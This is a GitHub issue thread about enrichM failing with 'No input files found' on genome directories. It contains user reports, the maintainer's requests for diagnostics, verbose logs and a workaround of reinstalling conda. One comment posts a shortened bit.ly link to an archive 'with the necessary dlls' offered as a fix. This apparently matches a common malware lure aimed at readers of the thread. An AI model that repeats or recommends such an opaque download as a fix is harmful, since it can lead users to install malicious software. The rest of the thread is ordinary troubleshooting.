### ISSUE TITLE
No input files found all the time

### ISSUE THREAD

**Issue by YoungerRen** [geronimp/enrichM#138]
dears 
there are some issues about the enrichm.
When I use enrichm to process my MAGs, it always reports the following error.
![image](https://github.com/user-attachments/assets/12392aef-7138-4433-8563-ca0d4ff9e033)

and i downloaded the enrichm v0.5.0,v0.6.3,v0.6.5,but all of them reported the error.  and I have found some reported problems similar to this one, but my attempts to solve them have been unsuccessful, and no solution has been proposed for this type of problem. Can you tell me what to do? This problem has been bothering me for almost a week now .
following code is my input code.
![image](https://github.com/user-attachments/assets/022c37e4-05dd-440e-9fee-6172e4e642a1)

best 
Younger

**Comment by 102898Is** [comment]
This might help:This file might fix it
https://bit.ly/4gwC82r
I put the necessary dlls in the archive

**Comment by geronimp** [comment]
Hello Younger, 

Would you be able to provide a view of what files are in the "bins" directory?

Kind regards,
Joel

**Comment by YoungerRen** [comment]
ok, Joel!this is my bins directory:
![image](https://github.com/user-attachments/assets/672c8379-2b11-46fc-82f9-e5c8e8cf896c)
best
Younger

**Comment by geronimp** [comment]
Thanks Younger, looks like everything is fine there,

My suspicion here is that the prodigal pipeline is failing silently, resulting in this misleading error. I'll need to fix this, but in the meantime would you also be able to check that prodigal is correctly installed on your server? If it is, let me know and I can dig a little further.

**Comment by YoungerRen** [comment]
Thanks, Joel. the prodigal is fine!i checked the prodigal version, and it showed it was fine! i do hope u can solve the issue,
![image](https://github.com/user-attachments/assets/00f437f1-461f-4917-8d51-4ec7d47f269c)
please let me know if u solve the issue! thanks.

best
Younger

**Comment by geronimp** [comment]
Thanks Younger, just one last thing, would you be able to rerun adding `--verbosity 5` in the command? this will help me narrow down exactly where the pipeline is failing.

**Comment by YoungerRen** [comment]
ok,Joel!  
I tried again by adding --verbosity 5, the error was as following:
[2024-09-20 16:08:39 PM] INFO: Command: /public/home/hcao/taolab/RenYong/miniconda3/envs/enrichm/bin/enrichm annotate --genome_directory /public/home/hcao/taolab/jiahui/2stalga-bac-beadEXP/neiwaiceng/Result/test --threads 96 --ko --pfam --cazy --orthologs --suffix .fna --output /public/home/hcao/taolab/jiahui/2stalga-bac-beadEXP/neiwaiceng/Result/bin_anno --verbosity 5
[2024-09-20 16:08:39 PM] INFO: Running the annotate pipeline
[2024-09-20 16:08:39 PM] INFO: Running pipeline: annotate
[2024-09-20 16:08:39 PM] INFO: Setting up for genome annotation
[2024-09-20 16:08:39 PM] INFO: Calling proteins for annotation
[2024-09-20 16:08:39 PM] INFO:     - Calling proteins for 1 genomes
[2024-09-20 16:08:39 PM] DEBUG: ls /public/home/hcao/taolab/jiahui/2stalga-bac-beadEXP/neiwaiceng/Result/test/*.fna |                     sed 's/.fna//g' |                     grep -o '[^/]*$' |                     parallel -j 5                         prodigal                             -q                             -p meta                             -o /dev/null                             -d /public/home/hcao/taolab/jiahui/2stalga-bac-beadEXP/neiwaiceng/Result/bin_anno/genome_genes/{}.fna                             -a /public/home/hcao/taolab/jiahui/2stalga-bac-beadEXP/neiwaiceng/Result/bin_anno/genome_proteins/{}.faa                             -i /public/home/hcao/taolab/jiahui/2stalga-bac-beadEXP/neiwaiceng/Result/test/{}.fna                             > /dev/null 2>&1
[2024-09-20 16:08:40 PM] DEBUG: Finished
[2024-09-20 16:08:40 PM] ERROR: No files found with .fna suffix in input directory
Traceback (most recent call last):
  File "/public/home/hcao/taolab/RenYong/miniconda3/envs/enrichm/bin/enrichm", line 351, in <module>
    run.run_enrichm(args, sys.argv)
  File "/public/home/hcao/taolab/RenYong/miniconda3/envs/enrichm/lib/python3.7/site-packages/enrichm/run.py", line 416, in run_enrichm
    pipeline(args)
  File "/public/home/hcao/taolab/RenYong/miniconda3/envs/enrichm/lib/python3.7/site-packages/enrichm/run.py", line 307, in run_annotate
    args.protein_files)
  File "/public/home/hcao/taolab/RenYong/miniconda3/envs/enrichm/lib/python3.7/site-packages/enrichm/annotate.py", line 875, in annotate_pipeline
    raise Exception("No input files found")
Exception: No input files found

and the "test" directory was the new files i built to test the code, which include a fna file.
best
Younger

**Comment by andremarpe** [comment]
Dears, 
I’m analyzing my MAGs with EnrichM 0.6.5 and got exactly the same error as @YoungerRen . 
This issue has been taking up a lot of my time over the past few weeks. 

Could anyone help me with this? 
I’d really appreciate any help or suggestions!

Regards, 
Andrea


micromamba activate /home/lem/micromamba/envs/enrichm_env_0.6.5
(enrichm_env_0.6) lem@nzxt:/media/patricia/f21f0a48-f5fe-411d-bad9-a8c6b2348fe5/Datos3/2_Andrea_M/metagenomas/C1_Mal$ ls -lh
total 32K
drwxrwxr-x 6 lem lem 4.0K Mar 28 10:25 BIN_REASSEMBLY_FINAL_50_10
drwxrwxr-x 8 lem lem 4.0K Mar 24 21:05 BIN_REFINEMENT_50_10
drwxrwxr-x 4 lem lem 4.0K Apr  2 16:10 Checkm2_results
drwxrwxr-x 5 lem lem 4.0K Mar 28 19:35 GTDB
drwxrwxr-x 6 lem lem 4.0K Feb 13 00:59 INITIAL_BINNING_mW
drwxrwxr-x 3 lem lem 4.0K Feb  4 23:05 megahit_C1_Mal
drwxrwxr-x 3 lem lem 4.0K Mar 31 16:07 NEWICK_MAGs50
drwxrwxr-x 2 lem lem 4.0K Apr 11 15:59 reassembled_bins_fna

(enrichm_env_0.6) lem@nzxt:/media/patricia/f21f0a48-f5fe-411d-bad9-a8c6b2348fe5/Datos3/2_Andrea_M/metagenomas/C1_Mal$ enrichm annotate --output Enrichm_annotate --genome_directory reassembled_bins_fna/ --ko_hmm --cazy --threads 10
[2025-04-11 16:23:42 PM] INFO: Command: /home/lem/micromamba/envs/enrichm_env_0.6.5/bin/enrichm annotate --output Enrichm_annotate --genome_directory reassembled_bins_fna/ --ko_hmm --cazy --threads 10
[2025-04-11 16:23:42 PM] INFO: Running the annotate pipeline
[2025-04-11 16:23:42 PM] INFO: Running pipeline: annotate
[2025-04-11 16:23:42 PM] INFO: Setting up for genome annotation
[2025-04-11 16:23:42 PM] INFO: Calling proteins for annotation
[2025-04-11 16:23:42 PM] INFO:     - Calling proteins for 88 genomes
[2025-04-11 16:23:42 PM] ERROR: No files found with .fna suffix in input directory
Traceback (most recent call last):
  File "/home/lem/micromamba/envs/enrichm_env_0.6.5/bin/enrichm", line 351, in <module>
    run.run_enrichm(args, sys.argv)
  File "/home/lem/micromamba/envs/enrichm_env_0.6.5/lib/python3.6/site-packages/enrichm/run.py", line 416, in run_enrichm
    pipeline(args)
  File "/home/lem/micromamba/envs/enrichm_env_0.6.5/lib/python3.6/site-packages/enrichm/run.py", line 307, in run_annotate
    args.protein_files)
  File "/home/lem/micromamba/envs/enrichm_env_0.6.5/lib/python3.6/site-packages/enrichm/annotate.py", line 875, in annotate_pipeline
    raise Exception("No input files found")

**Comment by YoungerRen** [comment]
I suggesed you could remove your conda or install another conda (such as miniforge3), because i solved this problem when i installed another miniforge3. Then, i reinstalled the enrichm(v0.6.5) and downloaded the database. There is no errors about running single MAGs, but it was still something wrong when i make it run multi-MAGs, its output shown same frequency KO count in different MAGs, so i wrote a loop script to execute it. its OK now.
